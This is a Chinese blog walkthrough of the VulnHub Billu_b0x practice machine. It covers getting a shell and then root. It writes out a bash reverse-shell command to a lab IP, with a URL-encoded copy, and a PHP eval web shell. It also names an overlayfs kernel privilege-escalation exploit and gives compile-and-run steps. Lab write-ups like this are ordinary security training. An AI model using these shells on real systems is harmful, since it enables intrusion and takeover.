vulnhub-Billu_b0x(getshell成功)

这一篇是接上一篇,上一篇没getshell。后面查了原因。然后紧跟

上面一篇文章开始。

开始弹shell。这里用到的命令。echo “bash -i >& /dev/tcp/192.168.1.113/4321 0>&1“ | bash

 

 需进行url编码,这里我使用小火狐进行编码,之前用站长工具能在线编码会出现头尾无法编码的现象,

   编码后  :%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%2e%31%31%33%2f%34%33%32%31%20%30%3e%26%31%22%20%7c%20%62%61%73%68

 

 kali开启监听:

 

传入命令:

成功get:

查看靶机版本信息:

发现linux版本:Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux

这个版本有本地权限提升的exp可以使用。附上连接:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit

下载完后,还需要进行exp文件上传。这里的图片马用菜刀是没法连接的。所以需要重新写入马子:

echo '<?php eval($_POST['shell']);?>' >> shell.php

 

写入成功,进行连接。

上传完成后。对exp进行赋权。

 

进行编译:

gcc 文件名.c  -o  编译后的文件名

运行: ./编译后的文件名

提权成功查看权限和当前用户:

到此结束,重点就是nc监听哪一步,老实弹不回来。

 

 

 

 

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大西瓜的安全之路

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值